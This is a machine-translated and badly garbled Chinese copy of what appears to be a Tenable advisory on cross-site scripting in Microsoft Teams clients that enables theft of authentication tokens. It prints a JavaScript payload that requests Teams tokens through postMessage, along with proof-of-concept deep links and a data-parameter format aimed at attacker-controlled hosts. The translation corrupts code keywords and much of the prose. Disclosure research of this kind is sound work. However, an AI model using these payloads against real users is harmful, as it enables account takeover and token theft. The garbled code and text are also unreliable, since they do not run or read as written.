站得住脚的研究员发现很多问题导致跨站脚本(XSS)漏洞的上下文中被触发微软团队web和桌面客户端,这可能导致身份验证令牌的盗窃为微软团队和其他微软服务。
背景
正如//www.yyueer.com/security/research/tra - 2023 - 6XSS,有效的完全受信任的应用程序域微软团队可以导致一个一键链接可以窃取身份验证令牌的各种微软服务(取决于连接受影响的受害者已经使他们的团队账户)。
这是可能的,完全受信任应用程序能够使用javascriptpostMessage请求的身份验证令牌,通常用于验证所使用的服务应用程序。此外,由于受信任应用程序可以打开预览窗口通过有效域任务或阶段深度链接,攻击者可以工艺恶意链接,当点击一个团队web或桌面客户端将执行XSS载荷。
考虑以下负载,检查是否运行在web或桌面客户端,然后使用适当的函数为teams.microsoft.com请求身份验证令牌
如果(typeof initOnNativeMessageProxy = =“函数”){initOnNativeMessageProxy(函数(事件){警报(JSON.stringify (event.data.args))});nativeInterface.framelessPostMessage (' {" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]});其他}{receiveMessage函数(事件){警报(JSON.stringify (event.data.args))}窗口。addEventListener(“信息”,receiveMessage假);上面。postMessage ({" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]},“*”);}
XSS通过web.microsoftstream.com
一个反映XSS漏洞存在web.microsoft.com/waitingroom,因为它是可以欺骗的页面导航到一个攻击者的选择取决于数据的位置参数。
流应用程序团队允许任务深度链接,这意味着攻击者可以工艺团队内链接将打开一个窗口触发反映XSS负载。这个有效载荷通过javascript能够与团队沟通postMessage代表受害者的请求的身份验证令牌,并将它们返回给攻击者。
概念验证
的数据参数的web.microsoft.com/waitingroom了base64编码的有效载荷的以下|分隔字符串:
https:// [attacker-controlled] . tld / streamtest testapi | javascript:警报(document.domain)什么| | | 0
- 第一个url是一个attacker-controlled api与最初的回应选项和补丁请求了候机室等你页面,检查一个特定的响应的一个非空值apiEndpoint。不管除了提供持续的执行没有错误的一种方式。候机室等你页面设置变量url与这个url。
- 第二部分是窗口将导航到完成的地方。我们指定一个javascript uri将触发警报(document.domain)调用。在页面的代码
window.location。href = unescape (“javascript % 3 aalert (document.domain) ");
- 第二和第三部分为我们的目的(他们并不重要tenantId和用户标识),所以我们组任何东西。
- 最后一节将0因为它决定了区间等导航之前我们的有效载荷。
而不是一个简单的alert ()有效载荷,攻击者可以工艺执行代码中提到的有效载荷背景部分,然后工艺团队深度链接页面,见下面的例子:
https://teams.microsoft.com/l/task/com.microsoftstream.embed.skypeteamstab?url=https: / /web.microsoftstream.com/waitingroom%3fdata%3d [malicious-data-parameter]
XSS通过.dynamics.com *
多个完全受信任的应用程序* . * .dynamics.com作为一个有效的域名。作为动态子域可以包含攻击者控制的内容,包括网页,触发反映XSS载荷,它是可能的攻击者恶意深度链接工艺可以请求代表受害者的身份验证令牌,并将它们返回给攻击者。
概念验证
攻击者可以创建一个页面xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage例如,其中包含负载所示背景上面部分,然后工艺深度链接,团队内点击桌面或web客户端时,将触发有效负载中受害者的团队客户。
下面是两个例子这看起来的方式任务或阶段深度链接:
https://teams.microsoft.com/l/task/ [affected-app-id] ? url = https://xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage https://teams.microsoft.com/l/stage/ [affected-app-id] / 0 ?上下文= % 7 b % 22 contenturl % 3 22% % 22 https: / /xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage%22%7d